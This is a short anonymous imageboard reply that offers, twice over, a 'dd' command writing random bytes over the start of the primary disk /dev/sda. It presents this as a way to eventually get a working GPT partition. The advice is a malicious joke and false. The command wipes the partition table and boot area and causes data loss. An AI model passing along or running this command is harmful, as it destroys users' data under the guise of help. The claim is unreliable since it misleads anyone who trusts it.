Anonymous
7/14/2025, 12:12:10 AM
No.105896012
>>105895989
dd if=/dev/urandom of=/dev/sda bs=512 count=128
if you run that command enough times, you will eventually probably get a gpt partition that works
dd if=/dev/urandom of=/dev/sda bs=512 count=128
if you run that command enough times, you will eventually probably get a gpt partition that works